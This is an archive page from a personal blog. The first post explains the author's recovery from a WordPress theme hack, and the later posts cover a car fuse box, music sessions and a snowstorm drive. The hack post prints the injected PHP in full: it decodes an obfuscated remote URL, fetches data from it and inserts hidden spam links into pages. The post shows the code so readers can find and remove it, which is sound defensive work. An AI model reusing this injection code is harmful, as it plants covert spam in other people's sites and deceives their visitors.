home

Archive for the 'site miscellany' Category

When Hackers And Their Little Scripts Attack WordPress Themes, Or Dr. D-Allis Talking To You About The Hidden Dangers Of Cialis (Links)

Tuesday, May 26th, 2009

In the slightly Web 2.0-modified sentiments of the master, George Carlin,

Our thrust is to prick holes in the stiff front erected by the smut hackers. We must keep mounting an offensive to penetrate any crack in their defenses, so we can lay to rest their dominate position. We want them hung and we want stiff action. Let’s get on them. Let’s ram through a stiff permission change so it’ll be hard for them to get their hacks up. WordPress’ers have got to come together so we can whip this thing into submission. It’ll be hard on us but we can’t lick it by being soft.

There are many, many, many, many, many informative pages on WordPress hacks and their potentially long and involved fixes.  The contents of this post address one specific hack that happened recently to my own site, how to fix the hacked php file, and the steps to take to keep the hack from occurring again.  As usual, I provide as much of the text as I can in this post so that your google search for a particular phrase or snippet of php will land your here, as it well may have.  Speaking of google…

The presence of these hidden links on your website may cause hypertension, eye fatigue, chronic stress (if you don’t know how to remove them), and, when present for long durations, will result in a form email from google telling you that your site has been banned from google listings.  Something like the following (in crimson for emphasis):

Dear site owner or webmaster of somewhereville.com,

While we were indexing your webpages, we detected that some of your pages were using techniques that are outside our quality guidelines, which can be found here: http://www.google.com/support/webmasters/bin/answer.py?answer=35769&hl=en. This appears to be because your site has been modified by a third party. Typically, the offending party gains access to an insecure directory that has open permissions. Many times, they will upload files or modify existing ones, which then show up as spam in our index.

The following is some example hidden text we found at http://somewhereville.com/:

[INSERT QUESTIONABLE HIDDEN TEXT HERE]

In order to preserve the quality of our search engine, pages from somewhereville.com are scheduled to be removed temporarily from our search results for at least 30 days.

We would prefer to keep your pages in Google’s index. If you wish to be reconsidered, please correct or remove all pages (may not be limited to the examples provided) that are outside our quality guidelines. One potential remedy is to contact your web host technical support for assistance. For more information about security for webmasters, see http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html. When such changes have been made, please visit https://www.google.com/webmasters/tools/reconsideration?hl=en to learn more and submit your site for reconsideration.

Sincerely, Google Search Quality Team

Note: if you have an account in Google’s Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview?hl=en and going to the Message Center.

With my luck, the contents below will somehow get me banned again, in which case I’ll just make one big screen capture and post the image in a new entry.

I had received the above email some time ago from a previous hack that I had corrected in a previous version of WordPress (somewhere in the 2.3.x range).  Within the last week or so, I received an email from friend and fellow nanotechnologist Tom Moore over at machine-phase.blogspot.com with the following picture:

The one week I lay off the egosurfing…  Needless to say, my suspicions of a hack were aroused and, er, little else.  The same form of hack as my previous 2.3.x adventure, but this is in WordPress 2.7.1 and I had properly set folder and file permissions on the server hosting this blog.  Well, almost properly set permissions…

This most recent attack occurred to a php file in my theme, a modified version of Relaxation 3 Column that is, sadly, no longer in development (hence the modifications).  The problem is theme-non-specific, as much of the core theme file structure is similar across all WordPress themes and a properly written script need only search out contents (or file names) common to all themes.

The specific modification occurred to my header.php file, which contained the following new and highly exciting content (to show the HTML, I’ve inserted a space around each bracket):

< div id=”page” >
< div id=”top” >< a href=”/index.php” >< img title=”home” src=”<?php bloginfo(‘template_directory’); ?>/images/blank.gif” alt=”home” width=”1100″ height=”150″ / >< /a >< /div >

< div id=”wrapper” >< ?php /* wp_remote_fopen procedure */ $wp_remote_fopen=’aHR0cDovL3F3ZXRyby5jb20vc3MvdGVzdF8x'; $blarr=get_option(‘cache_vars’); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).’.md5′))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).’.txt’)); update_option(‘cache_vars’,$blarr); } $blarr=unserialize(base64_decode(get_option(‘cache_vars’))); if($blarr['hide_text']!=” && sizeof($blarr['links']) > 0){ if($blarr['random']){ $new=”; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=”; foreach($blarr['links'] as $k= > $v) $txt_out.=’ < a href=”‘.$v.'” > ‘.$k.'< /a >'; echo str_replace(‘[LINKS]‘,$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ? >

Original to the theme:

< div id=”page” >
< div id=”top” >< a href=”/index.php” >< img title=”home” src=”<?php bloginfo(‘template_directory’); ?>/images/blank.gif” alt=”home” width=”1100″ height=”150″ / >< /a >< /div >
<
div id=”wrapper” >

Hacked addition:

< ?php /* wp_remote_fopen procedure */ $wp_remote_fopen=’aHR0cDovL3F3ZXRyby5jb20vc3MvdGVzdF8x'; $blarr=get_option(‘cache_vars’); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).’.md5′))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).’.txt’)); update_option(‘cache_vars’,$blarr); } $blarr=unserialize(base64_decode(get_option(‘cache_vars’))); if($blarr['hide_text']!=” && sizeof($blarr['links']) > 0){ if($blarr['random']){ $new=”; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=”; foreach($blarr['links'] as $k= > $v) $txt_out.=’ < a href=”‘.$v.'” > ‘.$k.'< /a >'; echo str_replace(‘[LINKS]‘,$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ? >

And, of course, what you see for the link list depends on what the script generates at load time.  The pictures show cialis links (isn’t it nice to see a link on a blog that sends you to the manufacturer instead of some back-of-the-server distributor?), but a Firefox Page Source view loads the following viagra-centric HTML after a page reload:


< body >
< div id=”page” >
< div id=”top” >< a href=”/index.php” >< img src=”http://www.somewhereville.com/wp-content/themes/relaxation_3column/images/blank.gif” alt=”home” title=”home” width=”1100″ height=”150″ / >< /a >< /div >
< div id=”wrapper” >
< div id=’header_code’ >< font style=”position:absolute;overflow:hidden;height:0;width:0″ >< a href=”http://river.mit.edu/index.php?viagra=0″ >Best Viagra Alternative< /a >< a href=”http://river.mit.edu/index.php?viagra=1″ > Best Viagra < /a > …2 to 806 of similar… < a href=”http://river.mit.edu/index.php?viagra=807″ > 50 Mg Viagra < /a >< /font >< /div >

< div id=”content” >

The problem, and this is the important part, is that the permissions on the php files for this theme were set wide open so that anyone could read, write, and execute the theme files.  After making the proper changes to the (in this case) header.php file in my ../wp-content/themes/[your theme name here] directory to remove the h4ck0r content (and, in theory, you will see the same text if you have a similar hack to your theme/header.php file), the next step is to change the permissions on these files via whatever “Attributes” window your FTP client provides (or whatever your FTP/Telnet/SSH program of choice is).  In my case, I’ve been using Robert Vasvari’s phenomenal RBrowser for OSX for quite some time.  For this program, you would click on the theme directory of choice, then right-click and select “Change Attributes.”  You’ll be brought to a screen like the following:

Now, permission setting is a minor trick depending on what you have in the directories that need to be read or executed for a page or plug-in to properly load.  The 755 provides only the User (that should be you) with write access to files (and the “Apply to files inside selection” check will change everything in the folder).  For simple themes, you can very probably get away with 644, which provides all with read access and the user read and write access.  Frankly, I don’t even know if there’s a theme-based reason for execute to be enabled (anyone willing to correct me is more than welcome to).

Make the changes (in a text editor if you didn’t know this already, then FTP the corrected file(s) up and down), change permissions, and with luck and a few days wait, your google search will return something like the following and decidedly not like the image above:

Needless to say, if you’ve never scoured a php file and don’t know what to remove, your safest bet is just to blindly delete the theme, upload a fresh version, then change permissions.  And, if you made modifications to the php files, KEEP TRACK OF THE CHANGES.  And, of course, you should be backing up your database and website anyway in case the big one hits.

georgecarlin.com
ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked
wordpress.org/support/topic/195163
blog.taragana.com/index.php/archive/detailed-post-mortem-of-a-website-hack-through-wordpress-how-to-protect…
www.mydigitallife.info/2008/06/10/wordpress-hack-recover-and-fix-google-and-search-engine-or-no-cookie-traffic…
lorelle.wordpress.com/2009/03/07/firewalling-and-hack-proofing-your-wordpress-blog
wordpress.org
www.php.net
www.google.com
en.wikipedia.org/wiki/Hypertension
machine-phase.blogspot.com
en.wikipedia.org/wiki/Egosurfing
en.wikipedia.org/wiki/Permissions
widgets.wordpress.com/2006/06/18/relaxation-3-column
en.wikipedia.org/wiki/HTML
www.cialis.com/index.jsp
www.mozilla.com/en-US
www.viagra.com
en.wikipedia.org/wiki/File_Transfer_Protocol
www.rbrowser.com
www.apple.com/macosx

Fuse Box Description and Amperage Settings For “New” Volkswagen Beetles

Friday, April 10th, 2009

The Volkswagen New Beetle.  You can get a full-sized drum set into these things (although a 24″ kick’s going to require a padded case), a fact I learned after I bought the car in 2002, as my old Pearl Prestige Session drums had, at the time, been stolen by an antiquities-dealing crack addict who was part of a police sting operation to catch a drug lord on Syracuse‘s West Side.  One of my better band stories and proof that people on drugs are not in their right state of mind.  Also handy for transporting computer clusters across state lines.

The old Nanorex cluster and my Al Foster-phase Pearl Prestige Session kit.  Click on either for a larger image.

Just so no one else has to spend as much time looking around for this information as I did to figure out a problem with my Blinker/Hazard Relay, I provide the fuse box diagram below (for google and beyond).  Click on the image for a larger view.

If you lost this card, print and shove into the glove box.  You will eventually find it handy.

www.vw.com
www.vw.com/newbeetle/en/us
www.pearldrum.com
www.syracuse.com
www.nanorex.com
en.wikipedia.org/wiki/Al_Foster

Bartles And Dame’s or Free Jazz And Cadence As Interdisciplinary Excursion

Sunday, May 27th, 2007

“Musicians are in no way responsible for anything.”
“True Art is Always Free!”
– John Bartles

Related to the usual contents of this blog only inasmuch as I pay the maintenance fees regardless, a brief historical post firmly rooted in the “There’s a fine line between ‘Once upon a time’ and ‘You’re not going to believe this” category of entries. Sunday, March 4 2007 marked the most nontraditional collaboration of my musical career (it takes me that long to get information together. People who request anything from me by email probably already know this) with the recording of “John Bartless Presents Topless and Bottomless,” a title sure to artificially increase my Technorati rank.


The kit. Click for a larger version.

Bartles sighting. Click for a larger version.

How: The Metropolis Book Shoppe in North Syracuse had an am amazing run of free jazz and noise artists (Tone Collector, MoHa!, Jeff Arnal and Gordon Beeferman, Tatsuya Nakatani, just to name a few), from which I have a nice collection of autographed CDs of music none but a lucky handful will ever hear. At a few of those gigs appeared the John Bartles of which I blog. When the same 6 people comprise the majority of the audience at all the shows, you get to know everyone. Bartles never travels without a box full of some small selection of his complete works. At the time the jazz shows started, he said he was up to 64 total CDs over a 30-odd year span which, having now 25 or so in my collection with expectations of more in the mail on any random day, I unbelievably believe to be a reasonable count.

Who: John and I share a similar quirkiness (thanks Deepak) he’s had the benefit of honing far longer than I, which means the exchange of corny-to-off-color jokes ended only once we were back in our cars, much to the relief of the other participants. The extent to which Bartles’ music is nontraditional is reflected in his performance venues. This had become apparent to myself upon the usual google search, where most of the relevant John Bartles links direct one to Dr. Demento playlists. That, clearly, was the virtual handshake on his offer to have me come out and record. If the iconoclastic screwball that did for The Ogden Edsl Wahalia Blues Ensemble Mondo Bizzario Band (“Dead Puppies”), Barnes & Barnes (“Fish Heads”) and Napoleon XIV (“They’re Coming To Take Me Away (Ho Ho Ha Ha He He To The Funny Farm)”) what Beavis and Butthead did for Rob Zombie thought the work of John Bartles was air-worthy, that’s enough for me. Any of the circa-1990 to 1994 Jamesville-DeWitt Band Room Lunch Club would agree on that.

Where: The session was held at Holt Studio, home of studio ace and bassist extraordinaire Gary Holt (not to be confused with the guitarist for Exodus). The drive out to Geneseo offered yet another memorable stop to see Buzzo himself (Al Bruno) at Buzzo Music, a music and instrument stockpile housed in a strip mall whose interior is reminiscent of the Bartertown branch of Ameoba Music on the west coast or the Sound Garden here in Syracuse. With Bartles as my discount card, I scored a pair of Verisonic flip-out rubber brushes, the kind your Middle School buys in bulk knowing no single pair would last the school year. Between the flashback and the feel on Remo Fiberskyns, handedly worth the discounted price.

Session: Quick setup, introductions to Gary, Sean McLay (bassist) and Paul Ruske (other drummer), and we were off cutting tracks. No rehearsal, no prior knowledge of the tracks, just a requested style and a two-take maximum. If you’ve not done it before, I highly recommend NEVER jumping into a recording session laying down grooves with a second drummer you’ve never met, if for no other reason than the sanctity of the bassist’s mental state. Butch Trucks and Jaimoe we were not, but 5 or 10 more years of it and… During the free improv tunes, of course, the more arms and legs the better.

Two hours, six tracks, three jam sessions and a spat of sophomoric humor later, we’re packed and out the door back to civilization. Two weeks later, the first press arrives with 13 crafted pieces and liner notes (see photo).

A session and a story worth a mention. If any of the tunes make the Dr. Demento Show, rest assured it’ll be at the top of the CV. For those wondering just what it is I’m talking about, I provide an mp3 of “The Human Scratching Post” (the family-friendly one of the series).

www.technorati.com
www.metropolisbookshoppe.com
www.northsyracuse.org
www.tonymalaby.com
www.myspace.com/themoha
www.myspace.com/jeffarnal
www.myspace.com/gordonbeeferman
www.hhproduction.org/TATSUYA_NAKATANI_WORKS.html
mndoci.com/blog/2007/04/18/tagged-as-a-thinker/
mndoci.com
www.google.com
www.google.com/search?num=100&hl=en&safe=off&q=%22john+bartles%22&btnG=Search
www.drdemento.com
www.google.com/search?num=100&hl=en&safe=off&q=%22john+bartles%22+demento&btnG=Search
en.wikipedia.org/wiki/Ogden_Edsl
en.wikipedia.org/wiki/Barnes_&_Barnes
en.wikipedia.org/wiki/Napoleon_XIV
en.wikipedia.org/wiki/Beavis_and_butthead
www.robzombie.com
www.jamesvilledewitt.org
www.holtstudio.biz
www.exodusattack.com
www.geneseony.com
www.democratandchronicle.com/homes/community/geneseo/story12.html
maps.google.com/maps?f=l&=&q=buzzo+music&near=Geneseo%2C+NY&btnG=Search+Businesses
en.wikipedia.org/wiki/Mad_Max_Beyond_Thunderdome
www.amoeba.com
www.cdjoint.com
www.syracuse.com
www.verisonicsticks.com
www.verisonicsticks.com/brushes/index.html#vs60
www.remo.com
www.remo.com/portal/products/3/8/52/ds_fiberskyn_3.html
www.garageband.com/artist/chinchillas
www.drummerworld.com/drummers/Butch_Trucks_Jaimoe.html
www.somewhereville.com/?page_id=52

Zoro, Joy Williams, Ben Glover, And The Brothers Feng

Sunday, May 27th, 2007

With a random reunion at the Marshall St. Starbucks, I’ve found myself the guest of fellow JD Class of ’94 alum and olde buddy Mike Feng at two concerts as part of CNY Crossroads. There’s a certain logic to expecting professionalism and excellent performances from the Christian folk/rock community, as lip-sync’ing is, somehow, a smote-worthy offense. I’m reminded of an Amy Grant performance at some Billboard Music Awards show way back when during her “Heart in Motion” phase and watching the drummer ACT like he was hitting his left crash cymbal while clearly MISSING the target despite audio to the contrary. Let’s face it. If the drummer’s fakin’, the band’s plugged into ground and that’s about it.

And I’ve got two words for Ashlee Simpson. Skid Row.


Click for a larger version.

Click for the video.

I went to the most recent show (April 28, 2007) specifically to see Zoro, easily one of the funkiest groove drummers around (I refer you to the list of accolades on his own site. Baby, it’d bad). While backstage, I also met Joy Williams and Ben Glover, the “other” performers for the evening of which I’d known nothing prior. Completely laid back and casual, genuinely happy to be in Syracuse performing from Nashville. After Zoro’s first (of two short) drumset spots, Joy and Ben came out and completely leveled the place (that’s music jargon if you’re not a member of the discourse community). Ben is the consummate guitar accompanist and background vocalist, and we killed a good hour after the show engrossed in nanotech (when people ask what else I do besides drumming, well, you can imagine where the conversation goes). As for Joy, words do little justice to the quality of the singing voice she carries around (that’s my musical AND professional opinion, BTW). I took the opportunity of a false start to record one of the two cover tunes of the night (In Your Eyes, by Peter Gabriel), the video for which I provide above.

en.wikipedia.org/wiki/Marshall_Street
www.starbucks.com
ww.jamesvilledewitt.org
www.pecinc.com/pecsite
www.cnycrossroads.com
www.amygrant.com
www.billboard.com/bbcom/index.jsp
www.youtube.com/watch?v=MziHkbJRMdU
www.youtube.com/watch?v=W5zu2mUEe8Q
www.zorothedrummer.com
www.zorothedrummer.com/about.htm
www.joywilliams.net/index.html
www.christianitytoday.com/music/artists/benglover.html
www.syracuse.com
www.nashville.net
www.petergabriel.com

“We have no idea what’s going on up there.”

Tuesday, February 13th, 2007
Oswego

It’s a fun story, certainly a prime example of my occasional lack of common sense, and more first-hand eyewitness reporting of the state of Oswego county and points nearby. So, because I’m here to blog it, I provide below my attempted travel to Clarkson for a department colloquium and nanoworkshop.

6:00 am – begin drive to Potsdam. Cold wind, blue skies.

6:20 am – approaching Mexico, NY. Few flakes, but nothing to stop a (er, my) VW Beetle.

6:25 am – within five minutes, blue skies had turned into white skies. The abruptness of the change from non-lake effect to lake effect should have been warning enough.

7:00 am – somewhere between 6:25 and 7:00 am, when it hadn’t been snowing THAT BAD yet, I decided it was time to do something stupid, so I pulled out the digital Elph, set it to movie mode, and recorded the little snippet above.

7:25 am – the turning point. After 1 hr, the 4-car caravan I found myself (thankfully) at the back of had made it nearly 5 miles towards the Mexico exit (34 on 81 N). By this time, the red glow of the taillights two cars in front of me were intermittently viewable due to snow obstruction. The exit itself was marked with a tractor trailer pulled to the side of the road, lights flashing. The three cars ahead of me begin the slow rightward veer to the exit. I trudge ahead beyond the exit…

7:26 am – … 13 feet. I wish now that I had had the better mind to take a picture of the view in front of me. My wagon train had been the ONLY thing on the road in at least… 20 minutes. In that 20 minutes, any pair of tire tracks were filled in, leaving nothing to follow. For all intensive purposes, 81 North WAS GONE. Literally disappeared. It looked like I had taken a hard right turn off the road and were facing the woods, the woods as they would have appeared after any other snow storm. The snow was at 7 inches where the tracks would have been, making the actual level of the snow all of 13 inches, making the path in front of me at least 3 inches higher than the clearance of the Beetle.

7:27 am – for the first time in my otherwise spotless driving career, I threw the car into reverse (which has to be some kind of no-no on a state highway) and drove back towards exit 34. Just barely making it to Route 104, I wait with the accumulated cars in the accumulation.

7:45 am – some small group of drivers begin the trip along 104 Wes, theoretically back onto 81 S. The on-ramp, invisible and sign-less, is overshot by all involved, leaving us to slip+slide along 104 W towards… nowhere in particular. With nowhere to turn around due to the height of the snow drifts, we trudge along for several miles. I knew there were houses there, as I could see the orange glow of room lights cutting through thinned snow drifts building up at house walls.

8:05 am – some spot in the road was wide enough to turn around, which we all did.

8:25 am – We reached the 81 South on-ramp just in time for the National Weather Service to declare a state of emergency in Oswego. “Far out,” I said. I hadn’t gotten near Oswego yet.

After 9:30 am – now comfortably out of the worst of the weather, I make the first calls to Cetin Cetinkaya at Clarkson and let him know I’m going to be late. About a week and a half late.

3 hr 3 min or so to get all of 35 miles. I’ve mentioned this to every Syracusan I’ve told the story to. No matter what you’ve seen on the TV, heard on the radio, or read about in the paper, we have no idea what’s going on up there.

www.usa.canon.com/consumer/controller?act=ModelDetailAct&fcategoryid=145&modelid=12466
www.google.com/maps?q=Mexico,+NY&sa=X&oi=map&ct=title
www.clarkson.edu/mae/faculty/cetinkaya.html
en.wikipedia.org/wiki/Lake_effect_snow
www.vw.com/newbeetle
www.co.oswego.ny.us
www.potsdam.ny.us
www.nws.noaa.gov
www.oswegony.org
www.clarkson.edu

Obligatory

  • CNYO

  • Sol. Sys. Amb.

  • Salt City Miners

  • Ubuntu 4 Nano

  • NMT Review

  • N-Fact. Collab.

  • T R P Nanosys

  • Nano Gallery

  • nano gallery
  • Aerial Photos

    More @ flickr.com

    Syracuse Scenes

    More @ flickr.com